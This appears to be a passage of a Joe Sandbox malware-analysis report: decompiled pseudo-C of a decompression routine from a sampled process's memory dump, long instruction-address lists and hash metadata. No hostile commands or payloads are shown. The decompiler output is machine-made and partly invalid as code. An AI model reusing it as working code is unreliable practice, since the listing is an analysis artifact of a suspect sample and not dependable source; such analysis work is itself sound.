                          													__eflags =  *_t338;
                          													goto L102;
                          												} else {
                          													L106:
                          													goto L99;
                          												}
                          											}
                          											L96:
                          											__edx =  *(__ebp - 4);
                          											__eax = __eax - __ebx;
                          											 *(__ebp - 0x40) = __ecx;
                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          											goto L108;
                          										case 0x1a:
                          											L56:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												L162:
                          												 *(__ebp - 0x88) = 0x1a;
                          												goto L170;
                          											}
                          											L57:
                          											__ecx =  *(__ebp - 0x68);
                          											__al =  *(__ebp - 0x5c);
                          											__edx =  *(__ebp - 8);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          											 *( *(__ebp - 0x68)) = __al;
                          											__ecx =  *(__ebp - 0x14);
                          											 *(__ecx +  *(__ebp - 8)) = __al;
                          											__eax = __ecx + 1;
                          											__edx = 0;
                          											_t192 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t192;
                          											goto L80;
                          										case 0x1b:
                          											L76:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												L163:
                          												 *(__ebp - 0x88) = 0x1b;
                          												goto L170;
                          											}
                          											L77:
                          											__eax =  *(__ebp - 0x14);
                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          											__eflags = __eax -  *(__ebp - 0x74);
                          											if(__eax >=  *(__ebp - 0x74)) {
                          												__eax = __eax +  *(__ebp - 0x74);
                          												__eflags = __eax;
                          											}
                          											__edx =  *(__ebp - 8);
                          											__cl =  *(__eax + __edx);
                          											__eax =  *(__ebp - 0x14);
                          											 *(__ebp - 0x5c) = __cl;
                          											 *(__eax + __edx) = __cl;
                          											__eax = __eax + 1;
                          											__edx = 0;
                          											_t275 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t275;
                          											__eax =  *(__ebp - 0x68);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											_t284 = __ebp - 0x64;
                          											 *_t284 =  *(__ebp - 0x64) - 1;
                          											__eflags =  *_t284;
                          											 *( *(__ebp - 0x68)) = __cl;
                          											L80:
                          											 *(__ebp - 0x14) = __edx;
                          											goto L81;
                          										case 0x1c:
                          											while(1) {
                          												L123:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													break;
                          												}
                          												L124:
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t414 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t414;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          												__eflags =  *(__ebp - 0x30);
                          												 *( *(__ebp - 0x68)) = __cl;
                          												 *(__ebp - 0x14) = _t414;
                          												if( *(__ebp - 0x30) > 0) {
                          													continue;
                          												} else {
                          													L127:
                          													L81:
                          													 *(__ebp - 0x88) = 2;
                          													goto L1;
                          												}
                          											}
                          											L167:
                          											 *(__ebp - 0x88) = 0x1c;
                          											goto L170;
                          									}
                          								}
                          								L171:
                          								_t539 = _t538 | 0xffffffff;
                          								goto L172;
                          							}
                          						}
                          					}
                          				}
                          			}















                          0x00406481
                          0x00406481
                          0x00406481
                          0x00406481
                          0x00406487
                          0x0040648b
                          0x0040648f
                          0x00406499
                          0x004064a7
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00000000
                          0x00000000
                          0x004067ba
                          0x004067c3
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x00406811
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406813
                          0x00406813
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x004068c8
                          0x004068d2
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
                          0x004068ee
                          0x004068ee
                          0x00406796
                          0x0040679c
                          0x004067a3
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x00000000
                          0x004067ae
                          0x00406818
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00406734
                          0x00405ed0
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00405edf
                          0x00000000
                          0x00405ee6
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef0
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4b
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f95
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fbf
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x00406005
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x004068bc
                          0x00000000
                          0x004068bc
                          0x00406713
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x0040672e
                          0x0040672e
                          0x00406734
                          0x00406734
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x00000000
                          0x004060d9
                          0x00406053
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x0040609e
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x004060b5
                          0x00000000
                          0x004062eb
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x00000000
                          0x00000000
                          0x00406398
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x00406424
                          0x0040640f
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00406688
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x0040678a
                          0x00406745
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00406734
                          0x00406734
                          0x00000000
                          0x0040673a
                          0x00000000
                          0x0040646a
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x0040678a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004064af
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x00406548
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004067b4
                          0x0040677d

                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                          • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                          • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                          • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406682() {
                          				void _t533;
                          				signed int _t534;
                          				signed int _t535;
                          				signed int* _t605;
                          				void* _t612;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t612 - 0x40) != 0) {
                          						 *(_t612 - 0x84) = 0x13;
                          						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                          						goto L132;
                          					} else {
                          						__eax =  *(__ebp - 0x4c);
                          						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          						__ecx =  *(__ebp - 0x58);
                          						__eax =  *(__ebp - 0x4c) << 4;
                          						__eax =  *(__ebp - 0x58) + __eax + 4;
                          						L130:
                          						 *(__ebp - 0x58) = __eax;
                          						 *(__ebp - 0x40) = 3;
                          						L144:
                          						 *(__ebp - 0x7c) = 0x14;
                          						L145:
                          						__eax =  *(__ebp - 0x40);
                          						 *(__ebp - 0x50) = 1;
                          						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          						L149:
                          						if( *(__ebp - 0x48) <= 0) {
                          							__ecx =  *(__ebp - 0x40);
                          							__ebx =  *(__ebp - 0x50);
                          							0 = 1;
                          							__eax = 1 << __cl;
                          							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          							__eax =  *(__ebp - 0x7c);
                          							 *(__ebp - 0x44) = __ebx;
                          							while(1) {
                          								L140:
                          								 *(_t612 - 0x88) = _t533;
                          								while(1) {
                          									L1:
                          									_t534 =  *(_t612 - 0x88);
                          									if(_t534 > 0x1c) {
                          										break;
                          									}
                          									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                          										case 0:
                          											if( *(_t612 - 0x6c) == 0) {
                          												goto L170;
                          											}
                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                          											_t534 =  *( *(_t612 - 0x70));
                          											if(_t534 > 0xe1) {
                          												goto L171;
                          											}
                          											_t538 = _t534 & 0x000000ff;
                          											_push(0x2d);
                          											asm("cdq");
                          											_pop(_t569);
                          											_push(9);
                          											_pop(_t570);
                          											_t608 = _t538 / _t569;
                          											_t540 = _t538 % _t569 & 0x000000ff;
                          											asm("cdq");
                          											_t603 = _t540 % _t570 & 0x000000ff;
                          											 *(_t612 - 0x3c) = _t603;
                          											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                          											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                          											_t611 = (0x300 << _t603 + _t608) + 0x736;
                          											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                          												L10:
                          												if(_t611 == 0) {
                          													L12:
                          													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                          													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                          													goto L15;
                          												} else {
                          													goto L11;
                          												}
                          												do {
                          													L11:
                          													_t611 = _t611 - 1;
                          													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                          												} while (_t611 != 0);
                          												goto L12;
                          											}
                          											if( *(_t612 - 4) != 0) {
                          												GlobalFree( *(_t612 - 4));
                          											}
                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                          											 *(_t612 - 4) = _t534;
                          											if(_t534 == 0) {
                          												goto L171;
                          											} else {
                          												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                          												goto L10;
                          											}
                          										case 1:
                          											L13:
                          											__eflags =  *(_t612 - 0x6c);
                          											if( *(_t612 - 0x6c) == 0) {
                          												 *(_t612 - 0x88) = 1;
                          												goto L170;
                          											}
                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                          											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                          											_t45 = _t612 - 0x48;
                          											 *_t45 =  *(_t612 - 0x48) + 1;
                          											__eflags =  *_t45;
                          											L15:
                          											if( *(_t612 - 0x48) < 4) {
                          												goto L13;
                          											}
                          											_t546 =  *(_t612 - 0x40);
                          											if(_t546 ==  *(_t612 - 0x74)) {
                          												L20:
                          												 *(_t612 - 0x48) = 5;
                          												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                          												goto L23;
                          											}
                          											 *(_t612 - 0x74) = _t546;
                          											if( *(_t612 - 8) != 0) {
                          												GlobalFree( *(_t612 - 8));
                          											}
                          											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                          											 *(_t612 - 8) = _t534;
                          											if(_t534 == 0) {
                          												goto L171;
                          											} else {
                          												goto L20;
                          											}
                          										case 2:
                          											L24:
                          											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                          											 *(_t612 - 0x84) = 6;
                          											 *(_t612 - 0x4c) = _t553;
                          											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                          											goto L132;
                          										case 3:
                          											L21:
                          											__eflags =  *(_t612 - 0x6c);
                          											if( *(_t612 - 0x6c) == 0) {
                          												 *(_t612 - 0x88) = 3;
                          												goto L170;
                          											}
                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                          											_t67 = _t612 - 0x70;
                          											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                          											__eflags =  *_t67;
                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                          											L23:
                          											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                          											if( *(_t612 - 0x48) != 0) {
                          												goto L21;
                          											}
                          											goto L24;
                          										case 4:
                          											L133:
                          											_t531 =  *_t605;
                          											_t588 = _t531 & 0x0000ffff;
                          											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                          											if( *(_t612 - 0xc) >= _t564) {
                          												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                          												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                          												 *(_t612 - 0x40) = 1;
                          												_t532 = _t531 - (_t531 >> 5);
                          												__eflags = _t532;
                          												 *_t605 = _t532;
                          											} else {
                          												 *(_t612 - 0x10) = _t564;
                          												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                          												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                          											}
                          											if( *(_t612 - 0x10) >= 0x1000000) {
                          												goto L139;
                          											} else {
                          												goto L137;
                          											}
                          										case 5:
                          											L137:
                          											if( *(_t612 - 0x6c) == 0) {
                          												 *(_t612 - 0x88) = 5;
                          												goto L170;
                          											}
                          											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                          											L139:
                          											_t533 =  *(_t612 - 0x84);
                          											goto L140;
                          										case 6:
                          											__edx = 0;
                          											__eflags =  *(__ebp - 0x40);
